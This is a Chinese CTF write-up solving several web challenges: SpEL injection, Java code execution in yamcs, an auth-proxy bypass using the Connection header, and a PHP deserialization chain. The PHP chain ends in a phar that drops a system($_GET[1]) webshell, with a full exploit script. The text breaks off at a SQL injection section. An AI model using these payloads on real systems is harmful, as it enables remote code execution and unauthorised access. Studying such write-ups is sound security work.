bbjv

先反编译一下

GatewayController.class

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
@RestController
public class GatewayController {
private final EvaluationService evaluationService;

public GatewayController(EvaluationService evaluationService) {
this.evaluationService = evaluationService;
}

@GetMapping({"/check"})
public String checkRule(@RequestParam String rule) throws FileNotFoundException {
String result = this.evaluationService.evaluate(rule);
File flagFile = new File(System.getProperty("user.home"), "flag.txt");
if (flagFile.exists()) {
try {
BufferedReader br = new BufferedReader(new FileReader(flagFile));

try {
String content = br.readLine();
result = result + "<br><b>\ud83d\udea9 Flag:</b> " + content;
} catch (Throwable var8) {
try {
br.close();
} catch (Throwable var7) {
var8.addSuppressed(var7);
}

throw var8;
}

br.close();
} catch (IOException var9) {
throw new RuntimeException(var9);
}
}

return result;
}
}

在/check路由中,会在user.home代表的目录下查找flag.txt,如果存在则读出来

1
File flagFile = new File(System.getProperty("user.home"), "flag.txt");

Dockerfile里可以看到flag的位置是/tmp/flag.txt,因此我们需要让user.home的值为/tmp

另外可以发现/check路由中我们可以传入一个rule参数,作为参数传入到evaluationService类的evaluate方法中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
@Service
public class EvaluationService {
private final ExpressionParser parser = new SpelExpressionParser();
private final EvaluationContext context;

public EvaluationService(EvaluationContext context) {
this.context = context;
}

public String evaluate(String expression) {
try {
Object result = this.parser.parseExpression(expression, new TemplateParserContext()).getValue(this.context);
return "Result: " + String.valueOf(result);
} catch (Exception var3) {
return "Error: " + var3.getMessage();
}
}
}

可以看到rule会被当作SpEL模板来执行,另外查阅下相关资料就知道使用parseExpression解析时传入的模板必须是 #{} 的格式

另外补充一些背景知识

在 SpEL 中,表达式解析和求值的流程可以分为三个关键部分:

  • ExpressionParser:负责将字符串表达式解析为 Expression 对象,类似于“编译器”将代码转为可执行单元。
  • EvaluationContext:提供表达式求值时的上下文环境,包含变量、属性解析器、类型转换器等,类似于“运行时环境”。
  • Expression:表示解析后的表达式对象,负责在特定上下文中计算结果,类似于“可执行的函数”。

但是在SpelConfig类中对表达式求值时的上下文环境EvaluationContext做了限制

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
@Configuration
public class SpelConfig {
public SpelConfig() {
}

@Bean({"systemProperties"})
public Properties systemProperties() {
return System.getProperties();
}

@Bean({"restrictedEvalContext"})
public EvaluationContext restrictedEvaluationContext(@Qualifier("systemProperties") Properties systemProperties) {
SimpleEvaluationContext simpleContext = SimpleEvaluationContext.forPropertyAccessors(new PropertyAccessor[]{new SecurePropertyAccessor()}).build();
simpleContext.setVariable("systemProperties", systemProperties);
return simpleContext;
}
}

SimpleEvaluationContext就是Spring官方专门搞出来的一个受限版SpEL环境,T(java.lang.XXX)这种类型引用,new 构造器表达式,任意方法调用,Bean解析,反射这些全部不允许。

另外结合SecurePropertyAccessor类,可以发现重写了canRead方法始终返回false,禁止了所有属性访问操作

1
2
3
4
5
6
7
8
public class SecurePropertyAccessor extends ReflectivePropertyAccessor {
public SecurePropertyAccessor() {
}

public boolean canRead(EvaluationContext context, Object target, String name) throws AccessException {
return false;
}
}

但是题目给我们留了一个系统属性systemProperties,由于SimpleEvaluationContext仍然允许对Map键值对的索引读写,因此我们可以用Map下标写入的形式去修改系统属性,即便SecurePropertyAccessor把属性访问禁了,它也拦不住我们去改Map里的东西,而user.home又正好是一个系统属性。

因此payload如下,#的作用是引用systemProperties,

1
#{#systemProperties['user.home']='/tmp'}

url编码一下发送即可

1
/check?rule=%23%7B%23systemProperties%5B%27user.home%27%5D%3D%27%2Ftmp%27%7D

yamcs

可以当作一个纯黑盒题来打,其实只要找到哪些能执行代码,哪里能看到代码执行的结果就可以了。

最终发现/algorithms/myproject/copySunsensor/-/summary?c=myproject__realtime里面可以执行代码

默认是执行

1
out0.setFloatValue(in.getEngValue().getFloatValue());

修改为

1
out0.setFloatValue(1);

可以在trace里的Runs看到输出
alt text

那么就知道我们能看到out0的值,后面让AI搓下代码把flag的值用out0带出来即可

一个示例payload

1
2
3
4
5
6
7
8
9
10
11
12
out0.setStringValue(
(String) java.util.concurrent.ForkJoinPool.commonPool().submit(
new java.util.concurrent.Callable() {
public Object call() throws Exception {
return new String(
java.nio.file.Files.readAllBytes(java.nio.file.Paths.get("/flag")),
java.nio.charset.StandardCharsets.UTF_8
);
}
}
).join()
);

SecretVault

app.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
import base64
import os
import secrets
import sys
from datetime import datetime
from functools import wraps
import requests

from cryptography.fernet import Fernet
from flask import (
Flask,
flash,
g,
jsonify,
make_response,
redirect,
render_template,
request,
url_for,
)
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.exc import IntegrityError
import hashlib

db = SQLAlchemy()

class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(80), unique=True, nullable=False)
password_hash = db.Column(db.String(128), nullable=False)
salt = db.Column(db.String(64), nullable=False)
created_at = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)
vault_entries = db.relationship('VaultEntry', backref='user', lazy=True, cascade='all, delete-orphan')


class VaultEntry(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
label = db.Column(db.String(120), nullable=False)
login = db.Column(db.String(120), nullable=False)
password_encrypted = db.Column(db.Text, nullable=False)
notes = db.Column(db.Text)
created_at = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)

def hash_password(password: str, salt: bytes) -> str:
data = salt + password.encode('utf-8')
for _ in range(50):
data = hashlib.sha256(data).digest()
return base64.b64encode(data).decode('utf-8')

def verify_password(password: str, salt_b64: str, digest: str) -> bool:
salt = base64.b64decode(salt_b64.encode('utf-8'))
return hash_password(password, salt) == digest

def generate_salt() -> bytes:
return secrets.token_bytes(16)

def create_app() -> Flask:
app = Flask(__name__)
app.config['SECRET_KEY'] = secrets.token_hex(32)
app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL', 'sqlite:///vault.db')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SIGN_SERVER'] = os.getenv('SIGN_SERVER', 'http://127.0.0.1:4444/sign')
fernet_key = os.getenv('FERNET_KEY')
if not fernet_key:
raise RuntimeError('Missing FERNET_KEY environment variable. Generate one with `python -c "from cryptography.fernet import Fernet; print(Fernet.generate_key().decode())"`.')
app.config['FERNET_KEY'] = fernet_key
db.init_app(app)

fernet = Fernet(app.config['FERNET_KEY'])
with app.app_context():
db.create_all()

if not User.query.first():
salt = secrets.token_bytes(16)
password = secrets.token_bytes(32).hex()
password_hash = hash_password(password, salt)
user = User(
id=0,
username='admin',
password_hash=password_hash,
salt=base64.b64encode(salt).decode('utf-8'),
)
db.session.add(user)
db.session.commit()

flag = open('/flag').read().strip()
flagEntry = VaultEntry(
user_id=user.id,
label='flag',
login='flag',
password_encrypted=fernet.encrypt(flag.encode('utf-8')).decode('utf-8'),
notes='This is the flag entry.',
)
db.session.add(flagEntry)
db.session.commit()

def login_required(view_func):
@wraps(view_func)
def wrapped(*args, **kwargs):
uid = request.headers.get('X-User', '0')
print(uid)
if uid == 'anonymous':
flash('Please sign in first.', 'warning')
return redirect(url_for('login'))
try:
uid_int = int(uid)
except (TypeError, ValueError):
flash('Invalid session. Please sign in again.', 'warning')
return redirect(url_for('login'))
user = User.query.filter_by(id=uid_int).first()
if not user:
flash('User not found. Please sign in again.', 'warning')
return redirect(url_for('login'))

g.current_user = user
return view_func(*args, **kwargs)

return wrapped

@app.route('/')
def index():
uid = request.headers.get('X-User', '0')
if not uid or uid == 'anonymous':
return redirect(url_for('login'))

return redirect(url_for('dashboard'))

@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'POST':
username = request.form.get('username', '').strip()
password = request.form.get('password', '')
confirm_password = request.form.get('confirm_password', '')
if not username or not password:
flash('Username and password are required.', 'danger')
return render_template('register.html')
if password != confirm_password:
flash('Passwords do not match.', 'danger')
return render_template('register.html')
salt = generate_salt()
password_hash = hash_password(password, salt)
user = User(
username=username,
password_hash=password_hash,
salt=base64.b64encode(salt).decode('utf-8'),
)
db.session.add(user)
try:
db.session.commit()
except IntegrityError:
db.session.rollback()
flash('Username already exists. Please choose another.', 'warning')
return render_template('register.html')
flash('Registration successful. Please sign in.', 'success')
return redirect(url_for('login'))
return render_template('register.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
username = request.form.get('username', '').strip()
password = request.form.get('password', '')
user = User.query.filter_by(username=username).first()
if not user or not verify_password(password, user.salt, user.password_hash):
flash('Invalid username or password.', 'danger')
return render_template('login.html')
r = requests.get(app.config['SIGN_SERVER'], params={'uid': user.id}, timeout=5)
if r.status_code != 200:
flash('Unable to reach the authentication server. Please try again later.', 'danger')
return render_template('login.html')

token = r.text.strip()
response = make_response(redirect(url_for('dashboard')))
response.set_cookie(
'token',
token,
httponly=True,
secure=app.config.get('SESSION_COOKIE_SECURE', False),
samesite='Lax',
max_age=12 * 3600,
)
return response
return render_template('login.html')

@app.route('/logout')
def logout():
response = make_response(redirect(url_for('login')))
response.delete_cookie('token')
flash('Signed out.', 'info')
return response

@app.route('/dashboard')
@login_required
def dashboard():
user = g.current_user
entries = [
{
'id': entry.id,
'label': entry.label,
'login': entry.login,
'password': fernet.decrypt(entry.password_encrypted.encode('utf-8')).decode('utf-8'),
'notes': entry.notes,
'created_at': entry.created_at,
}
for entry in user.vault_entries
]
return render_template('dashboard.html', username=user.username, entries=entries)

@app.route('/passwords/new', methods=['POST'])
@login_required
def create_password():
user = g.current_user
label = request.form.get('label', '').strip()
login_value = request.form.get('login', '').strip()
password_plain = request.form.get('password', '').strip()
notes = request.form.get('notes', '').strip() or None
if not label or not login_value or not password_plain:
flash('Service name, login, and password are required.', 'danger')
return redirect(url_for('dashboard'))
encrypted_password = fernet.encrypt(password_plain.encode('utf-8')).decode('utf-8')
entry = VaultEntry(
user_id=user.id,
label=label,
login=login_value,
password_encrypted=encrypted_password,
notes=notes,
)
db.session.add(entry)
db.session.commit()
flash('Password entry saved.', 'success')
return redirect(url_for('dashboard'))

@app.route('/passwords/<int:entry_id>', methods=['DELETE'])
@login_required
def delete_password(entry_id: int):
user = g.current_user
entry = VaultEntry.query.filter_by(id=entry_id, user_id=user.id).first()
if not entry:
return jsonify({'success': False, 'message': 'Entry not found'}), 404
db.session.delete(entry)
db.session.commit()
return jsonify({'success': True})

return app


if __name__ == '__main__':
flask_app = create_app()
flask_app.run(host='127.0.0.1', port=5000, debug=False)

main.go

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
package main

import (
"crypto/rand"
"encoding/hex"
"fmt"
"log"
"net/http"
"net/http/httputil"
"strings"
"time"

"github.com/golang-jwt/jwt/v5"
"github.com/gorilla/mux"
)

var (
SecretKey = hex.EncodeToString(RandomBytes(32))
)

type AuthClaims struct {
jwt.RegisteredClaims
UID string `json:"uid"`
}

func RandomBytes(length int) []byte {
b := make([]byte, length)
if _, err := rand.Read(b); err != nil {
return nil
}
return b
}

func SignToken(uid string) (string, error) {
t := jwt.NewWithClaims(jwt.SigningMethodHS256, AuthClaims{
UID: uid,
RegisteredClaims: jwt.RegisteredClaims{
Issuer: "Authorizer",
Subject: uid,
ExpiresAt: jwt.NewNumericDate(time.Now().Add(time.Hour)),
IssuedAt: jwt.NewNumericDate(time.Now()),
NotBefore: jwt.NewNumericDate(time.Now()),
},
})
tokenString, err := t.SignedString([]byte(SecretKey))
if err != nil {
return "", err
}
return tokenString, nil
}

func GetUIDFromRequest(r *http.Request) string {
authHeader := r.Header.Get("Authorization")
if authHeader == "" {
cookie, err := r.Cookie("token")
if err == nil {
authHeader = "Bearer " + cookie.Value
} else {
return ""
}
}
if len(authHeader) <= 7 || !strings.HasPrefix(authHeader, "Bearer ") {
return ""
}
tokenString := strings.TrimSpace(authHeader[7:])
if tokenString == "" {
return ""
}
token, err := jwt.ParseWithClaims(tokenString, &AuthClaims{}, func(token *jwt.Token) (interface{}, error) {
if _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {
return nil, fmt.Errorf("unexpected signing method: %v", token.Header["alg"])
}
return []byte(SecretKey), nil
})
if err != nil {
log.Printf("failed to parse token: %v", err)
return ""
}
claims, ok := token.Claims.(*AuthClaims)
if !ok || !token.Valid {
log.Printf("invalid token claims")
return ""
}
return claims.UID
}

func main() {
authorizer := &httputil.ReverseProxy{Director: func(req *http.Request) {
req.URL.Scheme = "http"
req.URL.Host = "127.0.0.1:5000"

uid := GetUIDFromRequest(req)
log.Printf("Request UID: %s, URL: %s", uid, req.URL.String())
req.Header.Del("Authorization")
req.Header.Del("X-User")
req.Header.Del("X-Forwarded-For")
req.Header.Del("Cookie")

if uid == "" {
req.Header.Set("X-User", "anonymous")
} else {
req.Header.Set("X-User", uid)
}
}}

signRouter := mux.NewRouter()
signRouter.HandleFunc("/sign", func(w http.ResponseWriter, r *http.Request) {
if !strings.HasPrefix(r.RemoteAddr, "127.0.0.1:") {
http.Error(w, "Forbidden", http.StatusForbidden)
}
uid := r.URL.Query().Get("uid")
token, err := SignToken(uid)
if err != nil {
log.Printf("Failed to sign token: %v", err)
http.Error(w, "Failed to generate token", http.StatusInternalServerError)
return
}
w.Write([]byte(token))
}).Methods("GET")

log.Println("Sign service is running at 127.0.0.1:4444")
go func() {
if err := http.ListenAndServe("127.0.0.1:4444", signRouter); err != nil {
log.Fatal(err)
}
}()

log.Println("Authorizer middleware service is running at :5555")
if err := http.ListenAndServe(":5555", authorizer); err != nil {
log.Fatal(err)
}
}

可以发现程序初始化的时候会把flag放到admin用户的信息里,并且只要以admin身份登录后就可以在/dashboard看到flag。我们重点关注登录的鉴权逻辑,如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
def login_required(view_func):
@wraps(view_func)
def wrapped(*args, **kwargs):
uid = request.headers.get('X-User', '0')
print(uid)
if uid == 'anonymous':
flash('Please sign in first.', 'warning')
return redirect(url_for('login'))
try:
uid_int = int(uid)
except (TypeError, ValueError):
flash('Invalid session. Please sign in again.', 'warning')
return redirect(url_for('login'))
user = User.query.filter_by(id=uid_int).first()
if not user:
flash('User not found. Please sign in again.', 'warning')
return redirect(url_for('login'))
g.current_user = user
return view_func(*args, **kwargs)
return wrapped

可以发现Flask每次请求时,都会从HTTP请求头中取出X-User,如果没有就默认是0,正好前面可以看到admin用户的uid就是0,但是没有那么简单,因为从main.go里面可以看到5555端口是有一个Authorizer middleware,而从docker-compose.yml里可以看出docker内部实际转发出的端口就是5555,因此我们的请求是首先到5555端口,然后才被转发到5000端口的python服务。因此只要我们能保证在请求到达python服务时请求头里面没有X-User即可。

接下来看看main.go里面是怎么处理的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
func main() {
authorizer := &httputil.ReverseProxy{Director: func(req *http.Request) {
req.URL.Scheme = "http"
req.URL.Host = "127.0.0.1:5000"

uid := GetUIDFromRequest(req)
log.Printf("Request UID: %s, URL: %s", uid, req.URL.String())
req.Header.Del("Authorization")
req.Header.Del("X-User")
req.Header.Del("X-Forwarded-For")
req.Header.Del("Cookie")

if uid == "" {
req.Header.Set("X-User", "anonymous")
} else {
req.Header.Set("X-User", uid)
}
}}

可以看到如果uid为空,会设置X-User为anonymous,否则设为uid,因为我们不知道admin用户的密码并且无法伪造jwt,所以这样一来怎么都不可能让X-User为0

这里最终的解决办法是用到了一个trick,在Connection头中写入HTTP请求头,代理就不会转发这个请求头,这样就可以实现X-User无赋值,从而让X-User默认为0。
Connection头是只对当前连接有效的选项(connection-specific options)。意味着它不能被代理(proxy)转发到后续的连接中。具体可参考https://github.com/golang/go/issues/50580

使用hackbar可以轻松完成
alt text

ezphp

1
<?=eval(base64_decode('ZnVuY3Rpb24gZ2VuZXJhdGVSYW5kb21TdHJpbmcoJGxlbmd0aCA9IDgpeyRjaGFyYWN0ZXJzID0gJ2FiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6JzskcmFuZG9tU3RyaW5nID0gJyc7Zm9yICgkaSA9IDA7ICRpIDwgJGxlbmd0aDsgJGkrKykgeyRyID0gcmFuZCgwLCBzdHJsZW4oJGNoYXJhY3RlcnMpIC0gMSk7JHJhbmRvbVN0cmluZyAuPSAkY2hhcmFjdGVyc1skcl07fXJldHVybiAkcmFuZG9tU3RyaW5nO31kYXRlX2RlZmF1bHRfdGltZXpvbmVfc2V0KCdBc2lhL1NoYW5naGFpJyk7Y2xhc3MgdGVzdHtwdWJsaWMgJHJlYWRmbGFnO3B1YmxpYyAkZjtwdWJsaWMgJGtleTtwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoKXskdGhpcy0+cmVhZGZsYWcgPSBuZXcgY2xhc3Mge3B1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgpe2lmIChpc3NldCgkX0ZJTEVTWydmaWxlJ10pICYmICRfRklMRVNbJ2ZpbGUnXVsnZXJyb3InXSA9PSAwKSB7JHRpbWUgPSBkYXRlKCdIaScpOyRmaWxlbmFtZSA9ICRHTE9CQUxTWydmaWxlbmFtZSddOyRzZWVkID0gJHRpbWUgLiBpbnR2YWwoJGZpbGVuYW1lKTttdF9zcmFuZCgkc2VlZCk7JHVwbG9hZERpciA9ICd1cGxvYWRzLyc7JGZpbGVzID0gZ2xvYigkdXBsb2FkRGlyIC4gJyonKTtmb3JlYWNoICgkZmlsZXMgYXMgJGZpbGUpIHtpZiAoaXNfZmlsZSgkZmlsZSkpIHVubGluaygkZmlsZSk7fSRyYW5kb21TdHIgPSBnZW5lcmF0ZVJhbmRvbVN0cmluZyg4KTskbmV3RmlsZW5hbWUgPSAkdGltZSAuICcuJyAuICRyYW5kb21TdHIgLiAnLicgLiAnanBnJzskR0xPQkFMU1snZmlsZSddID0gJG5ld0ZpbGVuYW1lOyR1cGxvYWRlZEZpbGUgPSAkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ107JHVwbG9hZFBhdGggPSAkdXBsb2FkRGlyIC4gJG5ld0ZpbGVuYW1lOyBpZiAoc3lzdGVtKCJjcCAiLiR1cGxvYWRlZEZpbGUuIiAiLiAkdXBsb2FkUGF0aCkpIHtlY2hvICJzdWNjZXNzIHVwbG9hZCEiO30gZWxzZSB7ZWNobyAiZXJyb3IiO319fXB1YmxpYyBmdW5jdGlvbiBfX3dha2V1cCgpe3BocGluZm8oKTt9cHVibGljIGZ1bmN0aW9uIHJlYWRmbGFnKCl7ZnVuY3Rpb24gcmVhZGZsYWcoKXtpZiAoaXNzZXQoJEdMT0JBTFNbJ2ZpbGUnXSkpIHskZmlsZSA9ICRHTE9CQUxTWydmaWxlJ107JGZpbGUgPSBiYXNlbmFtZSgkZmlsZSk7aWYgKHByZWdfbWF0Y2goJy86XC9cLy8nLCAkZmlsZSkpZGllKCJlcnJvciIpOyRmaWxlX2NvbnRlbnQgPSBmaWxlX2dldF9jb250ZW50cygidXBsb2Fkcy8iIC4gJGZpbGUpO2lmIChwcmVnX21hdGNoKCcvPFw/fFw6XC9cL3xwaHxcP1w9L2knLCAkZmlsZV9jb250ZW50KSkge2RpZSgiSWxsZWdhbCBjb250ZW50IGRldGVjdGVkIGluIHRoZSBmaWxlLiIpO31pbmNsdWRlKCJ1cGxvYWRzLyIgLiAkZmlsZSk7fX19fTt9cHVibGljIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKXskZnVuYyA9ICR0aGlzLT5mOyRHTE9CQUxTWydmaWxlbmFtZSddID0gJHRoaXMtPnJlYWRmbGFnO2lmICgkdGhpcy0+a2V5ID09ICdjbGFzcycpbmV3ICRmdW5jKCk7ZWxzZSBpZiAoJHRoaXMtPmtleSA9PSAnZnVuYycpIHskZnVuYygpO30gZWxzZSB7aGlnaGxpZ2h0X2ZpbGUoJ2luZGV4LnBocCcpO319fSRzZXIgPSBpc3NldCgkX0dFVFsnbGFuZCddKSA/ICRfR0VUWydsYW5kJ10gOiAnTzo0OiJ0ZXN0IjpOJztAdW5zZXJpYWxpemUoJHNlcik7'));

index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
function generateRandomString($length = 8) {
$characters = 'abcdefghijklmnopqrstuvwxyz';
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$r = rand(0, strlen($characters) - 1);
$randomString .= $characters[$r];
}
return $randomString;
}

date_default_timezone_set('Asia/Shanghai');

class test {
public $readflag;
public $f;
public $key;

public function __construct() {
$this->readflag = new class {
public function __construct() {
if (isset($_FILES['file']) && $_FILES['file']['error'] == 0) {
$time = date('Hi');
$filename = $GLOBALS['filename'];
$seed = $time . intval($filename);
mt_srand($seed);
$uploadDir = 'uploads/';
$files = glob($uploadDir . '*');
foreach ($files as $file) {
if (is_file($file)) {
unlink($file);
}
}
$randomStr = generateRandomString(8);
$newFilename = $time . '.' . $randomStr . '.' . 'jpg';
$GLOBALS['file'] = $newFilename;
$uploadedFile = $_FILES['file']['tmp_name'];
$uploadPath = $uploadDir . $newFilename;
if (system("cp " . $uploadedFile . " " . $uploadPath)) {
echo "success upload!";
} else {
echo "error";
}
}
}

public function __wakeup() {
phpinfo();
}

public function readflag() {
function readflag() {
if (isset($GLOBALS['file'])) {
$file = $GLOBALS['file'];
$file = basename($file);
if (preg_match('/:\/\//', $file)) {
die("error");
}
$file_content = file_get_contents("uploads/" . $file);
if (preg_match('/<\?|\:\/\/|ph|\?\=/i', $file_content)) {
die("Illegal content detected in the file.");
}
include("uploads/" . $file);
}
}
}
};
}

public function __destruct() {
$func = $this->f;
$GLOBALS['filename'] = $this->readflag;
if ($this->key == 'class') {
new $func();
} else if ($this->key == 'func') {
$func();
} else {
highlight_file('index.php');
}
}
}

$ser = isset($_GET['land']) ? $_GET['land'] : 'O:4:"test":N';
@unserialize($ser);

正常走destruct看phpinfo可以发现php版本为7.4.33

1
O:4:"test":2:{s:1:"f";s:7:"phpinfo";s:3:"key";s:4:"func";}

观察源代码 我们思路就是:

  • 传个文件
  • 调用到匿名类的readflag 使readflag被声明
  • 直接调用readflag
  • 文件包含

匿名类遵循这样的规则:

1
%00 + 函数 + 路径 : 行号$序号

但是这里是eval里注册的,我们起一个示例看看。可以通过 get_class() 的方式查看匿名类的序列化情况

1
2
3
4
5
<?php
eval('$b = new class{};');
echo get_class($b);
echo '<br>';
echo urlencode(get_class($b));
1
2
class@anonymousD:\phpstudy_pro\test\testtest.php(2) : eval()'d code:1$5
class%40anonymous%00D%3A%5Cphpstudy_pro%5Ctest%5Ctesttest.php%282%29+%3A+eval%28%29%27d+code%3A1%245

因此eval中的匿名类类名的规则是

1
class@anonymous + %00 + 路径 + : + (eval 的行号) + eval()'d code: + eval 中定义的行号 + $ 匿名类序号

所以我们可以这样调用到 readflag

1
2
3
4
5
6
7
8
9
10
$test1 = new test();
$test1->key = "func";
$test1->f = ["class@anonymous\00/var/www/html/index.php(1) : eval()'d code:1$0", 'readflag'];

$test2 = new test();
$test2 -> key = "func";
$test2 -> f = "readflag";

$payload = [$test1, $test2];
echo urlencode(serialize($payload));

这里 ["class@anonymous\00/var/www/html/index.php(1) : eval()'d code:1$0", 'readflag']是一个 PHP 回调数组 ["类名字符串", "方法名"],等价于 "类名字符串"::方法名();

也就是说,在 $test1 析构时

1
2
$func = $this->f;            // ["class@anonymous\00...$0", "readflag"]
$func(); // 等价于 class@anonymous\00...$0::readflag();

从而成功调用匿名类的方法 readflag(),这样方法 readflag() 内层的 function readflag(){...} 才会在全局被注册。

在 PHP 里,“在函数/方法里面写的 function xxx(){} 其实还是在定义一个全局函数,只是定义这件事要等执行到那一行才发生”。

能调用readflag后,肯定要去用上这个文件包含,但是这里有不少过滤

1
preg_match('/<\?|\:\/\/|ph|\?\=/i', $file_content)

其实这个考点前一段时间热度挺高,参考这个博客https://fushuling.com/index.php/2025/07/30/%E5%BD%93include%E9%82%82%E9%80%85phar-deadsecctf2025-baby-web/

我们可以上传一个用gzip压缩过的phar文件,最后只要文件名中有.phar,即可在被文件包含后默认把这个gz文件解压回phar进行解析。

我们可以这样构造 phar

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
$phar = new Phar('exploit.phar');
$phar->startBuffering();

$stub = <<<'STUB'
<?php
system('echo "<?php system(\$_GET[1]); ?>" > 1.php');
__HALT_COMPILER();
?>
STUB;

$phar->setStub($stub);
$phar->addFromString('test.txt', 'test');
$phar->stopBuffering();

?>

随后gzip压缩一下就可以,不过由于gzip压缩后文件名exploit.phar会留在文件的字符串里,还是会被waf检测到有ph,解决方法是用010editor直接把ph里面的一个字母改成别的字母就好了

那么最后的问题是如何构造这样的文件名,看一下文件名怎么生成的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
function generateRandomString($length = 8){
$characters = 'abcdefghijklmnopqrstuvwxyz';
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$r = rand(0, strlen($characters) - 1);
$randomString .= $characters[$r];
}
return $randomString;
}

$time = date('Hi');
$filename = $GLOBALS['filename'];
$seed = $time . intval($filename);
mt_srand($seed);
$randomStr = generateRandomString(8);
$newFilename = $time . '.' . $randomStr . '.' . 'jpg';

本地测试一下知道$time在一分钟内值是不会变的,filename又是我们可控,相当于任意一分钟内$seed也是我们可控的。那么我们只需要选定一个时间,提前爆破好能使$randomStr以phar开头的$filename即可。

完整exp如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
<?php
function generateRandomString($length = 8) {
$characters = 'abcdefghijklmnopqrstuvwxyz';
$randomString = '';
**for** ($i = 0; $i < $length; $i++) {
$r = rand(0, strlen($characters) - 1);
$randomString .= $characters[$r];
}
return $randomString;
}
date_default_timezone_set('Asia/Shanghai');
$time = date('Hi'); //date在一段时间内固定,及时发包即可

//爆破filename控制最终文件名
for ($filename = 1; $filename <= 999999999999999999; $filename++) {
$seed = $time . intval($filename);
srand($seed);
$randomStr = generateRandomString(8);
$newFilename = $time . '.' . $randomStr . '.' . 'jpg';

**echo** $time . "---" . $seed . "---" . $filename . "---" . $newFilename . "\n\n\n";

if (strpos($randomStr, 'phar') === 0) {
echo "Found 'phar' in filename! Stopping.\n";
break;
}
}


class test {
public $readflag;
public $f;
public $key;

public function __construct()//构造方法置空防止反序列化问题
{
}

}

//触发构造方法上传文件
$o1 = new test();
$o1->f = 'test';
$o1->key = 'class';
echo"---------------". $filename . "------------";
$o1->readflag = $filename;

//触发匿名类函数加载内部方法
$o2 = new test();
$o2->f = ["class@anonymous\0/var/www/html/index.php(1) : eval()'d code:1$0", 'readflag'];
$o2->key = 'func';

//触发内部方法文件包含
$o3 = new test();
$o3->f = 'readflag';
$o3->key = 'func';

$arr = [$o1, $o2, $o3];
$ser = serialize($arr);
echo urlencode($ser);

function sendrequest($url, $payload)
{
$ch = curl_init();

//上传构造好的恶意gzip
$postData = [
'file' => new CURLFile('./phpinfo.phar.gz', 'application/gzip', 'file.txt')
];

curl_setopt_array($ch, [
CURLOPT_URL => $url . '?land=' . $payload,
CURLOPT_POST => **true**,
CURLOPT_POSTFIELDS => $postData,
CURLOPT_RETURNTRANSFER => **true**,
CURLOPT_SSL_VERIFYPEER => **false**,
CURLOPT_TIMEOUT => 30,
]);

$response = curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);

if ($error) {
echo "cURL Error: " . $error;
} else {
echo $response;
}
}

$url = "";
sendrequest($url,urlencode($ser));

?>

PTer

https://mp.weixin.qq.com/s/4Fo5sZdRJP5J0aLemoz2EA
题目给出了用户qwb和密码,我们可以登录进系统中。

在announce.php中发现一处SQL注入,首先是一些参数检测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// get string type passkey, info_hash, peer_id, event, ip from client
